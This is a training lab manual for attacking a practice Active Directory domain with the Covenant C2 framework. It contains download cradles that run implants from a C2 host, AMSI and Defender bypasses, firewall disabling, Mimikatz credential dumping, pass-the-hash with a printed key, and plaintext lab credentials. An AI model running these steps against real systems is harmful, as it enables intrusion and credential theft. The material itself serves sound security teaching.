LabManual Covenant
Uploaded by
mrgradh123LabManual Covenant
Uploaded by
mrgradh123Attacking & Defending Active Directory -
Beginner Edition
Covenant Lab Manual
Table of Contents
Connecting to the Lab ............................................................................................................................ 3
Installing Covenant in Kali Linux ............................................................................................................ 4
Update Mimikatz in Covenant ............................................................................................................... 6
Introduction about Covenant ................................................................................................................ 7
Update the Listener Profile and HTTP Grunt template ......................................................................... 9
Setup the Listener ................................................................................................................................ 11
Generate Launcher ............................................................................................................................... 13
Host the Launcher ................................................................................................................................ 15
Delivering the Payload to the victim. .................................................................................................. 17
Learning Objective 1............................................................................................................................. 20
Learning Objective 2............................................................................................................................. 26
Learning Objective 3............................................................................................................................. 33
Learning Objective 4............................................................................................................................. 36
Learning Objective 5............................................................................................................................. 41
Learning Objective 6............................................................................................................................. 57
Learning Objective 7............................................................................................................................. 60
Learning Objective 8............................................................................................................................. 92
Learning Objective 9........................................................................................................................... 101
Learning Objective 10......................................................................................................................... 106
Learning Objective 11......................................................................................................................... 111
Learning Objective 12......................................................................................................................... 119
Learning Objective 13......................................................................................................................... 125
Learning Objective 14......................................................................................................................... 136
Learning Objective 15......................................................................................................................... 139
Learning Objective 16......................................................................................................................... 161
Learning Objective 17......................................................................................................................... 168
Learning Objective 18......................................................................................................................... 174
Learning Objective 19......................................................................................................................... 181
Learning Objective 20......................................................................................................................... 185
AlteredSecurity Attacking and Defending Active Directory 1
Learning Objective 21......................................................................................................................... 192
Learning Objective 22......................................................................................................................... 226
AlteredSecurity Attacking and Defending Active Directory 2
Connecting to the Lab
We need to use the VPN connectivity to connect the Lab Network from our Kali Linux
Machine.
Steps to Connect using Open VPN Client:
1. Download the VPN Config file to the Kali Linux Machine
2. Extract the data from the zip file
Note: Make sure to change the file name.
unzip BasicLab1-TCP4-443-student2-config.zip
3. Go to the VPN folder and connect to the VPN using the Config file.
Note: Make sure to change the file name.
sudo openvpn --config BasicLab1-TCP4-443-student2.ovpn
4. Enter the Credentials
AlteredSecurity Attacking and Defending Active Directory 3
Installing Covenant in Kali Linux
Install dotnet core 5.0 sdk
• Downloading the package file for Debian OS
wget https://packages.microsoft.com/config/debian/10/packages-
microsoft-prod.deb -O packages-microsoft-prod.deb
• Install the package
sudo dpkg -i packages-microsoft-prod.deb
• Download the package information
sudo apt update
• Download and install apt-transport-https
sudo apt install -y apt-transport-https
• Download the package information
sudo apt update
• Download and install the dotnet-sdk.5.0
sudo apt install -y dotnet-sdk-5.0
Reference link
https://docs.microsoft.com/en-us/dotnet/core/install/linux-debian
AlteredSecurity Attacking and Defending Active Directory 4
Download Covenant
• Clone the repo & the submodules from GitHub
git clone --recurse-submodules https://github.com/cobbr/Covenant
• We will be using the Dev branch of Covenant. So, we first need to checkout the Dev
branch.
Note: This is currently the most stable branch with bug fixes
cd Covenant
git checkout dev
• Go to the Covenant Directory
cd Covenant
• Build the project
dotnet build
• Run the project
Note: - We need to run the below command with sudo privileges or else we might not
be able to create some listeners.
sudo dotnet run
AlteredSecurity Attacking and Defending Active Directory 5
Update Mimikatz in Covenant
Covenant has multiple built-in tasks that also leverage additional projects like Rubeus,
Sharpsploit etc.
One of the Built-In tasks is Mimikatz that leverages Sharpsploit to execute Mimikatz to
extract credentials or perform additional activities. The Current version in of Mimikatz in the
Sharpsploit project is old that doesn't work on the new OS hence we need to update the DLL
files present in Covenant/Covenant/Data/EmbeddedResources/ folder. Below are the steps
to update the same.
Steps to update Mimikatz in Covenant
1. Clone the Mimikatz repository from https://github.com/gentilkiwi/mimikatz using git
clone command.
2. Open the project in Visual Studio
3. Select the Solution Configurations as "Second_Release_PowerShell"
4. Select the Solution Platform as "x64" for building the dll file for 64-bit architecture and
select the Solution Platform as "Win32" for building the dll file for 32-bit architecture.
5. Build the project 2 times. First with 64-bit arch and second with 32-bit arch.
6. Rename the files "powerkatz.dll" file to "SharpSploit.Resources.powerkatz_x64.dll" for
64-bit compiled dll and "SharpSploit.Resources.powerkatz_x86.dll" for 32-bit.
7. Replace both the files present in "Covenant/Covenant/Data/EmbeddedResources/"
folder.
Once we make the configuration, we can built the project 2 times. First with x64 arch and
second with Win32 arch.
Note: The above process can be followed to update the Mimikatz in Covenant but currently
the code available on the GitHub has some issues. So, we have a custom version of Mimikatz
in the lab that also work on the newer versions of Windows OS. Hence use the DLL files
provided in the tools folder.
AlteredSecurity Attacking and Defending Active Directory 6
Introduction about Covenant
Covenant is an Open-Source Collaborative Command and Control Framework written in
.Net. This framework can be helpful for Red Teamer those who want to manage the
accesses of the machines that are compromised during the assessment.
There are few Terms that we will be using in the lab very frequently.
1. Listener - To get an operation started, we will want to start a new listener. Covenant
supports native listeners and "bridge" listeners.
2. Launchers - Launchers are used to generate, host, and download binaries, scripts, and
one-liners to launch new Grunts.
3. Grunts - Grunts are Covenant's C# implant. Most of an operator's time will be spent
interacting with grunts to assign tasks and collect information.
4. Tasks - Tasks, or "modules", are common functionality that can be run on grunts.
Access the Web Interface
Once we build and run Covenant, we can access the Covenant web interface. Below is the
URL which can be used to access the Covenant web interface. Please use the IP address of
the system where the Covenant is installed. By default, the web interface of Covenant runs
on port 7443
https://{IP}:7443
AlteredSecurity Attacking and Defending Active Directory 7
Register Initial User
When we access the Covenant web interface for the first time, we need to register a user
that will be used to access Covenant and also it will have Administrators role. We can create
registry more user's once we have our initial user registered. Below is the screenshot of the
initial user registration page.
Once we register, we would be redirected to the Dashboard of Covenant. Below is the
screenshot of the Dashboard
AlteredSecurity Attacking and Defending Active Directory 8
Update the Listener Profile and HTTP Grunt template
Since we have Windows Defender enabled in our lab environment it is important to
leverage a custom HTTP Profile & Grunt template to bypass Windows Defender.
Note: Both the files are present in the C:\AD\Tools directory.
Steps to update the listener Profile
1. Click on Listeners option in the menu and then click on Profiles tab.
2. Click on Import button and upload the ModifiedHttpProfile.yaml file and click on
Import button.
Steps to update the Grunt template
AlteredSecurity Attacking and Defending Active Directory 9
1. Click on Templates option in the menu and then click on Import button upload the
ModifiedGruntHTTP.yaml file and then again click on Import button.
AlteredSecurity Attacking and Defending Active Directory 10
Setup the Listener
Steps to setup HTTP listener
2. Click on Listeners option in the menu and then click on Create button.
2. Enter the required details to create the listener and click on Create button.
1. Name - We can name the listener with any name. We will use HTTPListener as the
Name.
2. BindAddress - If we have multiple network interface and want to listen on specify
interface, we can set the BindAddress. By default, this needs to be on 0.0.0.0.
3. BindPort - We can keep this to default 80 or change. This is the port on which the
listener will bind to.
4. ConnectPort - We can keep this to default or change. This is the port on which the
agent (Grunt) will connect to.
5. ConnectAddress - We need to enter the IP of the host on which Covenant is
running. We can add multiple ConnectAddress and it can also contain the domain
name which can be pointed to the Covenant host.
6. UseSSL - We need to keep the default setting False as we are not going to use SSL
for communication.
7. HttpProfile - We can keep the ModifiedHttpProfile setting. There is an option to
create a custom profile for the listener.
AlteredSecurity Attacking and Defending Active Directory 11
Once we create the listener it can be viewed in the Listeners menu.
AlteredSecurity Attacking and Defending Active Directory 12
Generate Launcher
Steps to Create PowerShell launcher
1. Click on the Launchers option in the menu and then click on Create button and then
click on Create PowerShellLauncher
2. Enter the required details to create the Launcher and then click on Generate
1. Name - We can name the launcher with any name. We will use
PowerShellLauncher as the Name.
2. Description - We can keep the default value.
3. Listener - Select the HTTPListener which we created above.
4. ImplantTemplate - We will use the default template ModifiedGruntHTTP. The
implant template can be customized if needed and we can use a custom template.
5. DotNetVersion - We will use Net40 option since .NET4.0 is by default installed on
most of the newer version of windows.
6. OutputKind – Select the WindowsApplication option from the dropdown list. We
can also use ConsoleApplication as an option.
7. ValidateCert - We can currently ignore this option as we are using HTTP listener
without any SSL certificate. We can configure our listener to use HTTPS.
8. UseCertPinning - We can also ignore this option as we are not using listener with
HTTPS configuration.
9. Delay - We can keep this as default to 5 seconds. This option is used define the
sleep time between the agent (Grunt) and the Covenant host connections. Larger
value will increase the time between communication and execution of the task.
10. JitterPercent - We can keep this option also set to default. This will add the
variability in the Delay value.
AlteredSecurity Attacking and Defending Active Directory 13
11. ConnectAttempts - We can keep this option also set to default. This option defines
the number of times the agent (Grunt) will try to connect before quitting in case of
connection issues.
12. KillDate - Select a date manually when we want our agent to get killed. This option
will kill the agent (Grunt) automatically on the date and time set in this option.
AlteredSecurity Attacking and Defending Active Directory 14
Host the Launcher
Once we click on Generate, we can see that the Launcher & the EncodedLauncher textbox
are populated with the value that contains PowerShell script (Grunt Code in PowerShell).
The same can been seen in the screenshot below. The best way is to host the Launcher and
use it within our loaded. Covenant has a built-in module to host the files that might be
needed during the assessment. Below are the steps to host the file in Covenant.
AlteredSecurity Attacking and Defending Active Directory 15
Steps to Host the Launcher
1. Click on the Host tab in the PowerShell Launcher Window
2. Added the URL of the file from which it can be accessed. We have
added /HTTPGrunt.ps1 as the url. We can also add something
like /FolderName/FileName.ps1 where we can mimic the folder structure.
3. Click on Host button.
Once we click on Host we will see that the Launcher & EncodedLauncher textbox are filled
with value that contains the PowerShell code to download and run the
Launcher. Launcher textbox contains the code in plaintext & EncodedLauncher textbox
contains the code that is base64 encoded.
AlteredSecurity Attacking and Defending Active Directory 16
Delivering the Payload to the victim.
In the Lab we will be using PowerShell download cradle to deliver our payload. Since we are
using modified Grunt Template, we do not need any AMSI Bypass to get a call back. But we
need to run the built-in command BypassAmsi on all the new grunts.
Download and execute the payload
Once we are done with our basic setup, we will use known PowerShell download cradle to
download and execute the scripts on the Student VM.
Steps
1. Login to the Student VM via RDP using xfreerdp from Kali Linux. Below is the command
that can be used to take access to the Student VM via RDP.
Note - Please use the username, password and the IP address of the Student VM
allocated to you.
xfreerdp /u:student2 /p:PBKZZhYvtAQ5TYa4
/d:dollarcorp.moneycorp.local /v:172.16.100.2 /size:1024x650
2. Open the PowerShell console on the Student VM.
3. Copy the below mentioned PowerShell commands and executed in the PowerShell
console.
PowerShell -Sta -Nop -Window Hidden -Command "IEX (iwr
'http://172.16.99.2/HTTPGrunt.ps1' -UseBasicParsing)"
Once we run the above command, we will get the Grunt call back on our Covenant C2. The
same can be seen in the below screenshot.
Now, since we have gained the access to the Student VM we can started completing the Learning
Objectives using Covenant C2 Framework.
AlteredSecurity Attacking and Defending Active Directory 17
Note: - We will not be focusing on OPSEC while using Covenant C2 Framework to complete
our Learning Objectives. Before running any command on the new Grunts we need to run
the built-in task BypassAmsi always to avoid .NET AMSI Triggers.
Steps
o Note: - This task can also be executed from the Interact tab directly.
1. Click on the Grunt name in the Grunts page
2. Click on the Task tab
3. Select BypassAmsi from the GruntTask.
4. Click on Task button.
AlteredSecurity Attacking and Defending Active Directory 18
AlteredSecurity Attacking and Defending Active Directory 19
Learning Objective 1
Task
• Enumerate following for the dollarcorp domain:
o Users
o Computers
o Domain Administrators
o Enterprise Administrators
Solution
To enumerate the domain environment, we will need to import
the PowerView.ps1 PowerShell script using PowerShellImport built-in task in covenant.
Note: We will be using a modified version of PowerView.ps1 file.
Steps
o Note: - This task can also be executed from the Interact tab directly.
1. Click on the Grunt name in the Grunts page
AlteredSecurity Attacking and Defending Active Directory 20
2. Click on the Task tab
5. Select PowerShellImport from the GruntTask.
6. Browse the PowerView.ps1 PowerShell script.
7. Click on Task button.
AlteredSecurity Attacking and Defending Active Directory 21
Task - Enumerating the Users from dollarcorp domain
Once we upload the PowerView.ps1 PowerShell script we can click on the Interact tab and
execute the below mentioned command.
• Command
PowerShell Get-DomainUser
To list a specific property of all the users, say, samaccountname
• Command
PowerShell Get-DomainUser | select -ExpandProperty samaccountname
AlteredSecurity Attacking and Defending Active Directory 22
Task - Enumerating the Computers from dollarcorp domain
Now, to enumerate member computers in the domain we can use Get-DomainComputer
• Command
PowerShell Get-DomainComputer | select -ExpandProperty
dnshostname
AlteredSecurity Attacking and Defending Active Directory 23
Task - Enumerating the Domain Admin Group from dollarcorp domain
To see attributes of the Domain Admins group
• Command
Powershell Get-DomainGroup -Identity "Domain Admins"
To enumerate members of the Domain Admins group
• Command
PowerShell Get-DomainGroupMember -Identity "Domain Admins"
AlteredSecurity Attacking and Defending Active Directory 24
Task - Enumerating the Enterprise Admin Group from dollarcorp domain
To enumerate members of the Enterprise Admins group
• Command
PowerShell Get-DomainGroupMember -Identity "Enterprise Admins"
Since, this is not a root domain, the above command will return nothing. We need to query
the root domain as Enterprise Admins group is present only in the root of a forest.
• Command
PowerShell Get-DomainGroupMember -Identity "Enterprise Admins" –
Domain moneycorp.local
AlteredSecurity Attacking and Defending Active Directory 25
Learning Objective 2
Task
• Enumerate following for the dollarcorp domain:
o List all the OUs.
o List all the computers in the StudentMachines OU.
o List the GPOs.
o Enumerate GPO applied on the StudentMachines OU.
Solution
Task - Enumerating the dollarcorp domain and List all the OUs
We can continue using PowerView for enumeration. To list all the OUs
• Command
PowerShell Get-DomainOU
AlteredSecurity Attacking and Defending Active Directory 26
To see just the names of the OUs:
• Command
PowerShell Get-DomainOU | select -ExpandProperty name
AlteredSecurity Attacking and Defending Active Directory 27
Task - Enumerating the dollarcorp domain and List all the computers in the
StudentMachines OU
Now, to list all the computers in the StudentsMachines OU
• Command
PowerShell (Get-DomainOU -Identity
StudentMachines).distinguishedname | %{Get-DomainComputer -
SearchBase $_} | select name
AlteredSecurity Attacking and Defending Active Directory 28
Task - Enumerating the dollarcorp domain and list the GPOs
Use the below command to list the GPOs
Note the name (not displayname) of group policies may be different in your lab instance
• Command
PowerShell Get-DomainGPO
AlteredSecurity Attacking and Defending Active Directory 29
Task - Enumerating the GPO applied on the StudentMachines OU in
dollarcorp domain
To enumerate GPO applied on the StudentMachines OU
• Command
PowerShell (Get-DomainOU -Identity StudentMachines).gplink
AlteredSecurity Attacking and Defending Active Directory 30
• Command
PowerShell Get-DomainGPO -Identity '{7478F170-6A0C-490C-B355-
9E4618BC785D}'
AlteredSecurity Attacking and Defending Active Directory 31
It is possible to hack both the commands together in a single command (profiting from the
static length for GUIDs)
• Command
PowerShell Get-DomainGPO -Identity (Get-DomainOU -Identity
StudentMachines).gplink.substring(11,(Get-DomainOU -Identity
StudentMachines).gplink.length-72)
AlteredSecurity Attacking and Defending Active Directory 32
Learning Objective 3
Task
• Enumerate following for the dollarcorp domain:
o ACL for the Domain Admins group.
o All modify rights/permissions for the studentx.
Solution
Task - Enumerating the ACL for the Domain Admins group in dollarcorp
domain
To enumerate ACLs, we can use Get-DomainObjectACL from PowerView.
Let us enumerate ACLs for the Domain Admins group
• Command
PowerShell Get-DomainObjectAcl -Identity "Domain Admins" -
ResolveGUIDs –Verbose
AlteredSecurity Attacking and Defending Active Directory 33
Task - Enumerating All the ACL for modify rights/permissions for the studentx
in dollarcorp domain
Finally, to check for modify rights/permissions for the studentx, we can use Find-
InterestingDomainACL from PowerView
• Command
PowerShell Find-InterestingDomainAcl -ResolveGUIDs |
?{$_.IdentityReferenceName -match "student2"}
Nothing interesting!
AlteredSecurity Attacking and Defending Active Directory 34
Since studentx is a member of the RDPUsers group, let us check permissions for it too. Note
that the output in your lab for the below command will be different and will depend on your
lab instance.
• Command
PowerShell Find-InterestingDomainAcl -ResolveGUIDs |
?{$_.IdentityReferenceName -match "RDPUsers"}
AlteredSecurity Attacking and Defending Active Directory 35
Learning Objective 4
Task
• Enumerate all domains in the moneycorp.local forest.
• Map the trusts of the dollarcorp.moneycorp.local domain.
• Map External trusts in moneycorp.local forest.
• Identify external trusts of dollarcorp domain. Can you enumerate trusts for a trusting
forest?
Solution
Task - Enumerate all domains in the moneycorp.local forest.
Let us enumerate all domains in the current forest using PowerView
• Command
PowerShell Get-ForestDomain -Verbose
AlteredSecurity Attacking and Defending Active Directory 36
Task - Map the trusts of the dollarcorp.moneycorp.local domain.
To map the trusts of the dollarcorp domain
• Command
PowerShell Get-DomainTrust
AlteredSecurity Attacking and Defending Active Directory 37
Task - Map External trusts in moneycorp.local forest.
To map all the trusts of the moneycorp.local forest
• Command
PowerShell Get-ForestDomain | %{Get-DomainTrust -Domain $_.Name}
| ?{$_.TrustAttributes -eq “FILTER_SIDS”}
AlteredSecurity Attacking and Defending Active Directory 38
Task - Identify external trusts of dollarcorp domain. Can you enumerate
trusts for a trusting forest?
To identify external trusts of the dollarcorp domain, we can use the below command.
• Command
PowerShell Get-DomainTrust | ?{$_.TrustAttributes -eq
“FILTER_SIDS”}
AlteredSecurity Attacking and Defending Active Directory 39
Since it is a Bi-Directional trust, we can extract information from the eurocorp.local forest.
We either need bi-directional trust or one-way trust from eurocorp.local to dollarcorp to be
able to use the below command. Let us go for the last task and enumerate trusts for
eurocorp.local forest.
• Command
PowerShell Get-ForestDomain -Forest eurocorp.local | %{Get-
DomainTrust -Domain $_.Name}
AlteredSecurity Attacking and Defending Active Directory 40
Learning Objective 5
Task
• Exploit a service on dcorp-studentx and elevate privileges to local administrator.
• Identify a machine in the domain where studentx has local administrative access.
• Using privileges of a user on Jenkins on 172.16.3.11:8080, get admin privileges on
172.16.3.11 - the dcorp-ci server.
Solution
Task - Exploit a service on dcorp-studentx and elevate privileges to local
administrator.
To elevate our privileges, we will need to import the PowerUp.ps1 PowerShell script
using PowerShellImport built-in task in covenant.
Steps
o Note: - This task can also be executed from the Interact tab directly.
1. Click on the Grunt name in the Grunts page
AlteredSecurity Attacking and Defending Active Directory 41
2. Click on the Task tab
3. Select PowerShellImport from the GruntTask.
4. Browse the PowerUp.ps1 PowerShell script.
5. Click on Task button.
AlteredSecurity Attacking and Defending Active Directory 42
First, let us enumerate all the services with Unquoted Path. We will leverage the PowerUp
PowerShell script from PowerSploit module to list such services.
• Command
PowerShell Get-ServiceUnquoted
Nice, let us also enumerate services where the current can make changes to service binary
• Command
PowerShell Get-ModifiableServiceFile -Verbose
AlteredSecurity Attacking and Defending Active Directory 43
Let us also enumerate services with weak service permissions.
• Command
PowerShell Get-ModifiableService
AlteredSecurity Attacking and Defending Active Directory 44
Let us use the abuse function for Get-ModifiableService and get another grunt with Admin
Privileges.
• Command
PowerShell Invoke-ServiceAbuse -Name 'AbyssWebServer' -Command
'cmd.exe /c powershell.exe -Command "IEX (iwr
"http://172.16.99.2/HTTPGrunt.ps1" -UseBasicParsing)"'
We can see in the below screenshot that we have got another grunt with System privileges.
AlteredSecurity Attacking and Defending Active Directory 45
Task - Identify a machine in the domain where studentx has local
administrative access.
Now, to identify a machine in the domain where studentx has local administrative access we
will need to import the Find-PSRemotingLocalAdminAccess.ps1 PowerShell script
using PowerShellImport built-in task in covenant.
Steps
o Note: - This task can also be executed from the Interact tab directly.
1. Click on the Grunt name in the Grunts page
2. Click on the Task tab
3. Select PowerShellImport from the GruntTask.
4. Browse the Find-PSRemotingLocalAdminAccess.ps1 PowerShell script.
5. Click on Task button.
AlteredSecurity Attacking and Defending Active Directory 46
Once we import the Find-PSRemotingLocalAdminAccess.ps1 PowerShell script we can
execute the below mentioned command
• Command
PowerShell Find-PSRemotingLocalAdminAccess
AlteredSecurity Attacking and Defending Active Directory 47
So, studentx has administrative access on dcorp-adminsrv and some student machines. We
can confirm the administrative access by running a command via PSRemoting on the
machine
• Command
PowerShell Invoke-Command -ComputerName dcorp-
adminsrv.dollarcorp.moneycorp.local -ScriptBlock
{whoami;hostname}
Now, let us try our hands on the Jenkins instance.
To be able to execute commands on Jenkins server without admin access we must have
privileges to configure builds. We have a Jenkins instance on dcorp-ci
(http://172.16.3.11:8080).
AlteredSecurity Attacking and Defending Active Directory 48
We will use the Student VM to abuse the Jenkins Instance.
• Jenkins URL
http://172.16.3.11:8080/login?from=%2F
Since Jenkins does not have a password policy many users use username as passwords even
on the publicly available instances
(http://www.labofapenetrationtester.com/2015/11/week-of-continuous-intrusion-day-
1.html). By manually trying the usernames as passwords we identified that the
user builduser has password builduser. The user builduser can configure builds and add
build steps which will help us in executing commands.
Jenkins instance cannot connect back directly to our Covenant C2 hence we will need to
forward the traffic from the Student VM to our Covenant C2 instance. To do the same we
will leverage the built-in netsh utility. We need to execute the below command using
elevated privileges hence we will use the System privilege grunt to execute the command.
But first thing that we need to do is execute the built-in command BypassAmsi command.
AlteredSecurity Attacking and Defending Active Directory 49
• Command
ShellCmd netsh interface portproxy add v4tov4 listenport=80
listenaddress=0.0.0.0 connectport=8080 connectaddress=172.16.99.2
Now we need to check the firewall status and if the firewall is enabled, we need to disable
the firewall.
AlteredSecurity Attacking and Defending Active Directory 50
Below is the command to check the firewall status of the machine. This command needs to
be executed from the System privilege Grunt.
• Command
PowerShell Get-NetFirewallProfile
AlteredSecurity Attacking and Defending Active Directory 51
Below is the command to disable the firewall of the machine. This command needs to be
executed from the System privilege Grunt.
• Command
PowerShell Set-NetFirewallProfile -Profile Domain,Public,Private
-Enabled False
AlteredSecurity Attacking and Defending Active Directory 52
Once the firewall is disabled, we need to setup a new Covenant C2 Listener. Below
screenshot shows the configuration that needs to be applied to the new Listener.
• Listener Details
1. Enter HTTPListenerStudentVM in the Name field
2. Enter 172.16.99.2 IP address of the Covenant instance in the BindAddress field
3. Enter 8080 port in the BindPort field. (This is the port on which our listener will
listen)
4. Enter 80 port in the ConnectPort field. (This is the port on which our Grunt will try
to connect)
5. Enter 172.16.100.2 IP address of the Student VM in the ConnectAddresses field.
(This is the IP address on which the Grunt will try to connect)
6. HttpProfile - We can keep the ModifiedHttpProfile setting. There is an option to
create a custom profile for the listener.
Once the listener is setup, we need to generate the Launcher and host the new Grunt. We
will use the PowerShell Launcher.
AlteredSecurity Attacking and Defending Active Directory 53
• Launcher Details
1. Enter PowerShellLauncherStudentVM in the Name Field
2. Select HTTPListenerStudentVM Listener.
3. Select ModifiedGruntHTTP Implant Template.
4. Select Net40 DotNetVersion.
5. Select the KillDate
6. Keep the other field to the default value and click on Generate button.
AlteredSecurity Attacking and Defending Active Directory 54
Once the Launcher is generated, we need to host the launcher PowerShell script.
• Host the Launcher
1. Click on the Host tab in the PowerShell Launcher Window
2. Added the URL of the file from which it can be accessed. We have
added /StudentVMGrunt.ps1 as the URL. We can also add something
like /FolderName/FileName.ps1 where we can mimic the folder structure.
3. Click on Host button.
Once the payload is hosted, we will use the known PowerShell download cradle to
download and execute the StudentVMGrunt.ps1 script to gain another grunt of the Jenkins
instance.
• Command
cmd.exe /c PowerShell -Sta -Nop -Window Hidden -Command "IEX (iwr
'http://172.16.100.2/StudentVMGrunt.ps1' -UseBasicParsing)"
AlteredSecurity Attacking and Defending Active Directory 55
AlteredSecurity Attacking and Defending Active Directory 56
Learning Objective 6
Task
• Setup BloodHound and identify a machine where studentx has local administrative
access.
Solution
To run SharpHound we will need to import the SharpHound.ps1 PowerShell script
using PowerShellImport built-in task in covenant.
Steps
o Note: - This task can also be executed from the Interact tab directly.
1. Click on the Grunt name in the Grunts page
2. Click on the Task tab
3. Select PowerShellImport from the GruntTask.
4. Browse the SharpHound.ps1 PowerShell script.
5. Click on Task button.
AlteredSecurity Attacking and Defending Active Directory 57
Task - Setup BloodHound and identify a machine where studentx has local
administrative access.
Run the following PowerShell commands to run BloodHound Collectors to gather data and
information about the current domain.
• Note: - For setup please refer the Lab Manual. In this we will cover how we can leverage
Covenant C2 to execute the SharpHound.ps1 script and collect the data.
• Command
PowerShell Invoke-BloodHound -CollectionMethod All -Verbose
AlteredSecurity Attacking and Defending Active Directory 58
We can list the files of the current directory and check for *_bloodhound.zip file.
• Command
ls
Now we can download the file from the machine and load the data in the Bloodhound UI.
The downloaded data can be found inside the Covenant/Covenant/Data/Downloads/ folder
• Command
Download 20230319234341_BloodHound.zip
AlteredSecurity Attacking and Defending Active Directory 59
Learning Objective 7
Task
• Identify a machine in the target domain where a Domain Admin session is available.
• Compromise the machine and escalate privileges to Domain Admin
o Using access to dcorp-ci
o Using derivative local admin
Solution
To enumerate the domain environment, we will need to import
the PowerView.ps1 PowerShell script using PowerShellImport built-in task in covenant. But
before that we need to run the AMSI Bypass using the built-in command BypassAmsi.
We have access to two domain users – studentx and ciadmin and administrative access to
dcorp-adminsrv machine. User hunting has not been fruitful as studentx. We got a reverse
shell on dcorp-ci as ciadmin by abusing Jenkins. We will leverage the Jenkins instance for
further the enumeration.
Steps
o Note: - This task can also be executed from the Interact tab directly.
1. Click on the Grunt name in the Grunts page
AlteredSecurity Attacking and Defending Active Directory 60
2. Click on the Task tab
3. Select PowerShellImport from the GruntTask.
4. Browse the PowerView.ps1 PowerShell script.
5. Click on Task button.
AlteredSecurity Attacking and Defending Active Directory 61
Task - Identify a machine in the target domain where a Domain Admin
session is available.
Once we upload the PowerView.ps1 PowerShell script we can click on the Interact tab and
execute the below mentioned command.
• Command
PowerShell Find-DomainUserLocation
Great! A domain admin is logged in on dcorp-mgmt server. Now, let us check if we (as
ciadmin) have local admin access to dcorp-mgmt which will make it easier for us to attempt
escalation to domain admin.
AlteredSecurity Attacking and Defending Active Directory 62
Task - Compromise the machine and escalate privileges to Domain Admin -
Using access to dcorp-ci.
Let us confirm if we have local admin access on dcorp-mgmt server and if the PowerShell
Remoting port is open
• Command
PowerShell Invoke-Command -ScriptBlock {whoami;hostname} -
ComputerName dcorp-mgmt.dollarcorp.moneycorp.local
AlteredSecurity Attacking and Defending Active Directory 63
Now since we know that we have local admin rights on dcorp-mgmt machine we will
download and execute the PowerShell Launcher to get a new grunt of dcorp-mgmt machine.
• Command
PowerShell Invoke-Command -ScriptBlock {PowerShell -Sta -Nop -
Window Hidden -Command "IEX (iwr
'http://172.16.100.2/StudentVMGrunt.ps1' -UseBasicParsing)"} -
ComputerName dcorp-mgmt.dollarcorp.moneycorp.local
Since we have the grunt access with administrative privileges on the dcorp-mgmt machine
we will now use the built-in task Mimikatz to dump the credentials from the system.
Internally this task leverages SharpSploit library that indeed leverages Mimikatz. But before
that we need to run the AMSI Bypass using the built-in command BypassAmsi.
AlteredSecurity Attacking and Defending Active Directory 64
• Command
Mimikatz "sekurlsa::ekeys"
AlteredSecurity Attacking and Defending Active Directory 65
Sweet! We got credentials of svcadmin – a domain administrator. Note that svcadmin is
used as a service account (see "Session" in the above output), so we can even get
credentials in clear-text from lsasecrets!
Since we have the hash/keys of a domain admin, let us use the Built-in task of Mimikatz to
perform OverPass-The-Hash attack. To perform the attack, we need to create a new binary
launcher and the host same so that we can download and save it on the disk. Below are the
details to create a new binary launcher.
• Launcher Details
1. Click on Launchers Menu.
2. Click on Create button and then click on Create BinaryLauncher .
3. Enter BinaryLauncherStudentVM in the Name Field.
4. Select HTTPListenerStudentVM Listener.
5. Select ModifiedGruntHTTP Implant Template.
6. Select Net40 DotNetVersion.
7. Select the KillDate
8. Keep the other field to the default value and click on Generate button.
AlteredSecurity Attacking and Defending Active Directory 66
Once the Launcher is generated, we need to host the launcher Binary file.
• Host the Launcher
1. Click on the Host tab in the Binary Launcher Window
2. Added the URL of the file from which it can be accessed. We have
added /StudentVMGrunt.exe as the url. We can also add something
like /FolderName/FileName.ps1 where we can mimic the folder structure.
3. Click on Host button.
AlteredSecurity Attacking and Defending Active Directory 67
To confirm if our file is hosted properly, we can go to the HTTPListenerStudentVM Listener
and access the Hosted Files tab. We can see the StudentVMGrunt.exe file is host in the
below screenshot.
Download the StudentVMGrunt.exe file on the Student VM and save it to the disk. We will
the system privilege grunt for downloading the grunt and then for performing OverPass-
The-Hash attack.
Note: - We can also use the Upload option to upload our Grunt File on the machine.
• Command
PowerShell iwr -UseBasicParsing
http://172.16.100.2/StudentVMGrunt.exe -OutFile
C:\Users\Public\Downloads\StudentVMGrunt.exe
AlteredSecurity Attacking and Defending Active Directory 68
Check if the StudentVMGrunt.exe file is saved on the disk.
• Command
ls C:\Users\Public\Downloads\
Below are the steps to perform OverPass-The-Hash attack using Mimikatz and execute the
Grunt with the AES key of the svcadmin user.
Steps
o Note: - This task can also be executed from the Interact tab directly.
1. Click on the Grunt name in the Grunts page
AlteredSecurity Attacking and Defending Active Directory 69
2. Click on the Task tab
3. Select Mimikatz from the GruntTask.
4. Enter "sekurlsa::pth /user:svcadmin /domain:dollarcorp.moneycorp.local
/aes256:6366243a657a4ea04e406f1abc27f1ada358ccd0138ec5ca2835067719dc70
11 /run:C:\Users\Public\Downloads\StudentVMGrunt.exe" value in the Command
field.
5. Click on the Task button.
The new Grunt is connected back to our Covenant C2 that has Domain Admin privileges!
AlteredSecurity Attacking and Defending Active Directory 70
AlteredSecurity Attacking and Defending Active Directory 71
We need to add note in the New Grunt so that we can identify that it has token of Domain
Admin user.
Steps
1. Click on the Grunt name in the Grunts page
2. Enter svcadmin user privilege value in Note field.
3. Click on Edit button
AlteredSecurity Attacking and Defending Active Directory 72
Let us try to accessing the domain controller from the new Grunt.
• Command
ls \\dcorp-dc.dollarcorp.moneycorp.local\C$
AlteredSecurity Attacking and Defending Active Directory 73
Task - Escalate privileges to Domain Admin using derivative local admin.
Now moving on to the next task, we need to escalate to domain admin using derivative local
admin. As we already know we have local admin privileges on dcorp-
adminsrv.dollarcorp.moneycorp.local machine we will try to gain access to that machine.
We will use Student VM Grunt to gain access to dcorp-
adminsrv.dollarcorp.moneycorp.local machine.
• Command
PowerShell Invoke-Command -ScriptBlock {PowerShell -Sta -Nop -
Window Hidden -Command "IEX (iwr
'http://172.16.100.2/StudentVMGrunt.ps1' -UseBasicParsing)"} -
ComputerName dcorp-adminsrv.dollarcorp.moneycorp.local
AlteredSecurity Attacking and Defending Active Directory 74
